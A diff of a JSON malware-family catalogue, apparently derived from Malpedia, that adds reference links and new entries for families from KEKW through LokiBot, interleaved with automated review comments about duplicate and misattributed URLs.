+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw",
@@ -19039,7 +21774,7 @@
 "type": []
 },
 "uuid": "b178de96-14a3-49f1-a957-c83f86e23e83",
- "value": "KEKW Ransomware"
+ "value": "KEKW"
 },
 {
 "description": "",
@@ -19047,10 +21782,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos",
 "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/",
+ "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet",
+ "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
 "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
 "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
+ "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/",
 "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/",
 "https://en.wikipedia.org/wiki/Kelihos_botnet"
 ],
 "synonyms": [],
@@ -19188,7 +21926,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite"
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://mp.weixin.qq.com/s/cbaePmZSk_Ob0r486RMXyw"
 ],
 "synonyms": [],
 "type": []
@@ -19240,6 +21979,19 @@
 "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027",
 "value": "KillDisk"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killsomeone",
+ "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4d431d90-9dd5-4a77-9084-c010d6504f78",
+ "value": "KilllSomeOne"
+ },
 {
 "description": "",
 "meta": {
@@ -19261,12 +22013,14 @@
 "https://blog.prevailion.com/2019/09/autumn-aperture-report.html",
 "https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware",
 "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/",
+ "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
 "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
 "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
 "https://blog.alyac.co.kr/2347",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
 "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf"
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf",
+ "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign"
 ],
 "synonyms": [],
 "type": []
@@ -19274,6 +22028,19 @@
 "uuid": "860643d6-5693-4e4e-ad1f-56c49faa10a7",
 "value": "Kimsuky"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "04d95343-fd44-471d-bfe7-908994a98ea7",
+ "value": "Kingminer"
+ },
 {
 "description": "",
 "meta": {
@@ -19306,7 +22073,7 @@
 "type": []
 },
 "uuid": "6c585194-96d3-463d-ac21-aa942439cc26",
- "value": "KIVARS"
+ "value": "KIVARS (Windows)"
 },
 {
 "description": "Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.",
@@ -19325,6 +22092,7 @@
 "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
 ],
 "synonyms": [
@@ -19336,6 +22104,19 @@
 "uuid": "618b6f23-fc83-4aff-8b0a-7f7138be625c",
 "value": "KleptoParasite Stealer"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klingon_rat",
+ "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5f501884-2c72-4780-aaa6-c6b65e84fad8",
+ "value": "KlingonRAT"
+ },
 {
 "description": "",
 "meta": {
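Review bot: The third hunk adds `"https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer",` directly above an identical unchanged line, so the KleptoParasite `refs` array now holds the same URL twice; the added line should be dropped. The Koadic hunk further down has the same class of problem, adding `"http://www.secureworks.com/research/threat-profiles/gold-drake"` next to the existing `https://` form of the same page. Both look like artefacts of whatever generates these entries rather than intended edits, so the generator's deduplication (exact match, and ideally scheme-insensitive) is probably where the fix belongs.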
@@ -19351,7 +22132,7 @@
 "value": "KLRD"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot",
@@ -19361,7 +22142,7 @@
 "type": []
 },
 "uuid": "0479b7cd-982e-430e-a96e-338aec8ae3cf",
- "value": "Knot Ransomware"
+ "value": "Knot"
 },
 {
 "description": "",
@@ -19373,8 +22154,10 @@
 "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
 "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
 "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
 "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
 "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
 "https://github.com/zerosum0x0/koadic",
 "https://www.secureworks.com/research/threat-profiles/cobalt-ulster"
@@ -19421,6 +22204,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/",
 "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
 "https://blog.alyac.co.kr/2474",
 "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
@@ -19440,7 +22224,8 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -19456,6 +22241,7 @@
 "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/",
 "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/",
 "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf",
+ "https://www.youtube.com/watch?v=_fstHQSK-kk",
 "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
 "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
 "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit",
@@ -19468,6 +22254,7 @@
 "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
 "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
 "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment"
 ],
 "synonyms": [
@@ -19505,16 +22292,18 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer",
 "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware",
- "https://isc.sans.edu/diary/26010",
+ "https://news.drweb.com/show/?i=13242&lng=en",
 "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
 "https://isc.sans.edu/diary/25934",
- "https://news.drweb.com/show/?i=13242&lng=en",
+ "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
+ "https://isc.sans.edu/diary/26010",
 "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal",
 "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/",
- "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md"
+ "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/"
 ],
 "synonyms": [
 "Khalesi",
@@ -19531,6 +22320,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken",
 "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/",
 "https://www.recordedfuture.com/kraken-cryptor-ransomware/"
 ],
@@ -19575,6 +22365,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
 "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
 "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
 "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
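Review bot: The first hunk adds a 2010 BlackHat EU "State of Malware" slide deck to the `win.kraken` entry, whose other references (`kraken-cryptor-ransomware` on bleepingcomputer and recordedfuture, the McAfee Fallout post) all describe the 2018 Kraken Cryptor ransomware; a 2010 deck more plausibly discusses the earlier Kraken spam botnet, a different family that happens to share the name. The same archive link was added to Koobface in the previous hunk, where the era fits, so this looks like a name-based match; please confirm the deck mentions Kraken Cryptor or drop it here. The enclosing cluster object starts and ends outside the hunk.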
@@ -19584,11 +22375,13 @@
 "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
 "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
 "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/",
 "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
 "https://twitter.com/3xp0rtblog/status/1294157781415743488",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/"
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/",
+ "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan"
 ],
 "synonyms": [
 "Osiris"
@@ -19686,11 +22479,12 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
 "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html",
 "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
 "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
 "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/",
- "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html",
 "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
 ],
 "synonyms": [],
@@ -19811,7 +22605,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot",
- "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html"
+ "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf"
 ],
 "synonyms": [],
 "type": []
@@ -19820,7 +22615,7 @@
 "value": "LCPDot"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall",
@@ -19830,7 +22625,7 @@
 "type": []
 },
 "uuid": "526add8e-ed78-4e8e-8d4c-152570fe566e",
- "value": "Leakthemall Ransomware"
+ "value": "Leakthemall"
 },
 {
 "description": "",
@@ -19881,6 +22676,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc",
+ "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
+ "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
 "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html"
 ],
 "synonyms": [],
@@ -19932,7 +22729,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
- "https://github.com/werkamsus/Lilith"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
+ "https://github.com/werkamsus/Lilith",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt"
 ],
 "synonyms": [],
 "type": []
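Review bot: The second hunk adds the Talos `Network_IOCs_list_for_coverage.txt` reference with a trailing `?1625657479` query string while its sibling `Hashes_IOCs_for_coverage.txt` link has none; the suffix looks like a cache-busting timestamp rather than part of the document's identity, so keeping it leaves two otherwise parallel refs formatted differently and can make URL-based dedup treat later re-adds of the same file as new. Suggest storing the link without the `?1625657479` suffix, assuming the object resolves without it.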
@@ -19971,12 +22771,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat",
- "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
 "https://github.com/NYAN-x-CAT/Lime-RAT/",
+ "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
 "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
 "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/",
+ "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/",
 "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://lab52.io/blog/apt-c-36-recent-activity-analysis/"
+ "https://lab52.io/blog/apt-c-36-recent-activity-analysis/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html"
 ],
 "synonyms": [],
 "type": []
@@ -20057,21 +22862,48 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md",
- "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
- "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html",
+ "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
 "https://id-ransomware.blogspot.com/search?q=lockbit",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.netskope.com/blog/netskope-threat-coverage-lockbit",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion",
+ "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/",
+ "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/",
+ "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/",
+ "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
+ "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/",
 "https://blog.lexfo.fr/lockbit-malware.html",
 "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf",
- "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/",
+ "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
 "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"
+ "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/"
 ],
 "synonyms": [
 "ABCD Ransomware"
@@ -20088,6 +22920,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga",
 "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
 "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
 "https://www.abuse.io/lockergoga.txt",
 "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
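Review bot: The new LockBit refs list carries the same CrowdStrike article twice, `"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1"` and the same URL with a trailing slash, which suggests the export is not deduplicating by normalized URL. The same pattern shows up in the LokiBot hunk (`reversing.fun` and `blog.reversing.xyz` with the identical `/reversing/2021/06/08/lokibot.html` path, and the two `roboski-global-recovery-automation` URLs on different hosts), in the Lowball and Makadocs hunks (`kindredsec.com` next to `kindredsec.wordpress.com` for the same post), and in the Maze hunk (`malware-notes/blob/master/Maze.md` next to `malware-notes/blob/master/Ransomware/Maze.md`). Normalizing trailing slashes and stripping share/tracking parameters such as `?s=20` (Lorenz) and `?utm_campaign=...` (LokiBot) before deduplication would keep the reference lists from drifting. Separately, most of the churn in this hunk is existing refs removed and re-added in a different order; emitting refs in a stable sorted order would make future diffs show only genuine additions.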
@@ -20098,7 +22931,7 @@
 "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
 "https://www.youtube.com/watch?v=o6eEN0mUakM",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
 "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
 "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/"
@@ -20109,6 +22942,24 @@
 "uuid": "a4a6469d-6753-4195-9635-f11d458525f9",
 "value": "LockerGoga"
 },
+ {
+ "description": "A ransomware first observed in July 2021.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows",
+ "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/",
+ "https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/",
+ "https://twitter.com/VirITeXplorer/status/1428750497872232459",
+ "https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html",
+ "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "97879260-ee50-4c7e-8d87-4bb134d1fdaf",
+ "value": "LockFile"
+ },
 {
 "description": "Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.",
 "meta": {
@@ -20128,6 +22979,7 @@
 "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
 "https://vixra.org/pdf/2002.0183v1.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
 "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/",
@@ -20267,33 +23119,42 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws",
+ "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
 "https://isc.sans.edu/diary/24372",
 "http://www.malware-traffic-analysis.net/2017/06/12/index.html",
 "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/",
- "https://github.com/R3MRUM/loki-parse",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
 "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
 "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
+ "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
 "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850",
 "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file",
+ "http://reversing.fun/reversing/2021/06/08/lokibot.html",
 "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
 "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/",
 "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2",
